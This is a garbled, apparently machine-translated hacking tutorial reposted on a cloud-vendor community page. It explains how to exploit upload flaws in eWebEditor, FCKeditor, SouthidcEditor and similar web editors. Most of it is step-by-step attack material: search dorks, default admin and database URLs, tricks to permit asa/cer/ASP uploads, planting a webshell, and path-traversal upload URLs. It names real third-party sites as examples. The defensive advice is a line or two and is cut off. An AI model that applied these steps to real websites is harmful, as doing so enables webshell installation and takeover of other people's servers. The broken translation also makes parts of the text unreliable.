Several search editor Vulnerabilities

Source: Internet
Author: User

Site: editor inurl: asp? Id inurl: ewebeditornet

For example, common editor vulnerabilities include:

Ewebeditor
Ewebeditornet
Fckeditor
Editor
Southidceditor
SouthidcEditor
Bigaccessories ditor


I. ewebeditor


1: The background downloaded by default:


Http://www.test.com/ewebeditor/admin_login.asp

If the background can enter:

Click style management:

Copy a copy of the standard file (you cannot modify it directly)

Add the image type (asa aaspsp) to the copy and Click Preview.

Click design in the editor and then directly upload the asa Trojan.

After uploading, you can see the location of the Trojan in the code!

(Principle: because the application configures an asa extension in the properties of the iis website, asp. dll is used for parsing, and asp also has cer cdx)

If the cer cdx asa is deleted, the ing cannot be found.

You can add aaspsp to the style image type after copying, and then upload asp files directly after uploading.


2: Download the default database

Www.test.com/ewebeditor/db/ewebeditor.mdb

Then analyze the database

Webeditor_system (1), you can see that the user name and password cannot be cracked.

In the webeditor_style (14 style table

The extension (s-fileext s_ingeext) of the files that can be uploaded)

I saw a small hacker who once performed asa aaspsp too much.

You can use it! (This method can also be used if the backend cannot be found)

Statements that can be constructed:

For example, ID = 46 s-name = standard1

Construction Code: ewebeditor. asp? Id = content & style = standard

After the ID and style name are changed

Ewebeditor. asp? Id = 46 & style = standard1


Then, go to the editor and upload the asa or asp file to get the webshell.

Ii. Exploitation of ewebeditornet Vulnerabilities

Default upload address:

Aspx "> www.test.com/ewebeditornet/upload.aspx


You can directly upload a cer Trojan.

Upload fails.

You can construct the following code in the address bar: javascript: lbtnUpload. click ();

Then view the source code:

Find uploadsave find address

Uploaded to the previusfile folder by default.

(Vulnerability repair: You can directly select none of the execution permissions of the upload folder in iss .)

Iii. fckeditor vulnerability Exploitation

Http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp? Command = FileUpload & Type = Image & CurrentFolder =/
Change the file name field to NEWfile and select the file name to be defined.
After the upload, find the file in/userfiles/image /.


4. southidceditor

Http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

Http://www.xhkjit.com/admin/southidceditor/popup.asp

Http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp


5. bigaccessories ditor

This page is not mentioned.

Similar principles!

The defense method is very simple,


FCKeditor upload vulnerability,

Html? Type = all & Connector = connectors/asp/connector. asp "> http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = all & Connector = connectors/asp/connector. asp

Open this address to upload any types of files. The location where the horse uploads files is:
Http://www.xxx.com/UserFiles/all/1.asa
The variable "Type = all" is defined by yourself. The directory "all" is created here, and the new directory does not have any restrictions on the file format to be uploaded.

For example, input:
Http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = monyer & Connector = connectors/asp/connector. asp

The passed file is under the http://www.xxx.com/UserFiles/monyer/.

And if you enter: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html? Type = ../& Connector = connectors/asp/connector. asp
You can upload the script to the root directory of the website.

The uploaded file is under the root directory of the website.

Http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html? ForumID = 46 & threadID = 457 & messageID = 532 & ListType = FromForum & FromCurrentPage = 1 & time = 1219282232781

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.